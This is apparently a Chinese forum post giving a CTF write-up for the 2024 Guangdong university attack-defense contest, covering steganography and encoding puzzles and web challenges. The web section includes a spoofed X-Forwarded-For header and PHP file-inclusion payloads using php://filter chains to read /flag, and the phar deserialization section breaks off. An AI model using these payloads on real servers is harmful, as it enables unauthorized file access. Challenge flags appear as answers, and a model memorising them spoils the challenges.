ToB企服应用市场:ToB评测及商务社交产业平台
标题:
2024广东大学生攻防大赛WP
[打印本页]
作者:
没腿的鸟
时间:
2024-5-20 00:38
标题:
2024广东大学生攻防大赛WP
Misc
猜一猜
题目描述:
你们想要的flag就在压缩包里面。
压缩包文件名 解密
解压密码为a1478520
然后修改flag.png文件头
得到
扫描二维码之后
❀❁❀❇❀✼❀❂✿❆✿✽❁❀✿✾❂❅✿❄❂❉❀✿❂❆❀❃❀✿❂❆✿❀❁✾✻✿❁❁❀❁❂❊✻❂✿❈=
复制代码
花朵解密
https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=huaduo
得到flag
flag{rUsJyNdKhdKuS4VfO7}
复制代码
要的就在这
题目描述:
你要的在这里
用010editor打开
上面那个是定积分,解出来是π
然后6是什么呢,推测是3.1415
然后用stegpy解密
>python steg.py misc.png -p
Enter password (will not be echoed):
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733dk:luckyone
复制代码
3557736c7371495153424738633644326d352f4b5277672b36676a6d3174723144513855794a556d495a733d
这一串十六进制转字符
5WslsqIQSBG8c6D2m5/KRwg+6gjm1tr1DQ8UyJUmIZs=
k:luckyone
复制代码
flag{believe_you_are_lucky}
Web
消失的flag
题目描述:
flag就隐藏再某个文件里面,看看能不能包含出来 。
访问
推测是XFF,添加:x-forwarded-for:127.0.0.1
File is NUll
文件包含弊端
?file=/flag
复制代码
用另一种方法
?file=php://filter/read=convert.base64-encode/resource=/flag
复制代码
也不可
最后试出
?file=php://filter/convert.iconv.utf-8.utf-7/resource=/flag
复制代码
df4083ae2869462cad0d002533f6cbf7
unserialize_web
同事给我了一个反序列话的源码,在线求助 !
看这篇文章有了灵感
https://blog.csdn.net/qq_53460654/article/details/121889104
https://pankas.top/2022/08/04/php(phar)反序列化弊端及各种绕过姿势/#phar反序列化
首先扫一下目录发现/www.tar.gz
生成.phar
[code]
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4